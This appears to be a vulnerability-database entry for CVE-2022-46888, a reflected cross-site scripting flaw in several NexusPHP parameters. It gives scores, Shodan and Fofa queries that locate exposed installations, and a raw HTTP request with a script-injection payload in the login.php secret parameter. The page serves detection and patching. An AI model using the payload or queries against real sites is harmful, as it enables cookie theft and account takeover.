| Title | NexusPHP <1.7.33 - Cross-Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Attackers can inject malicious JavaScript through multiple parameters including secret in login.php, potentially stealing session cookies and credentials when users interact with crafted URLs in NexusPHP. |
| Remediation | Upgrade to NexusPHP version 1.7.33 or later to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.16278 |
| CVE ID | CVE-2022-46888 |
| CWE ID | CWE-79 |
| Shodan Query | http.favicon.hash:-582931176cpe:"cpe:2.3:a:nexusphp:nexusphp" |
| Fofa Query | icon_hash=-582931176 |
| Tags | cve cve2022 nexus php nexusphp xss vuln |
NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks..
GET /login.php?secret="><script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-46888.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-46888.pcap
N/AN/A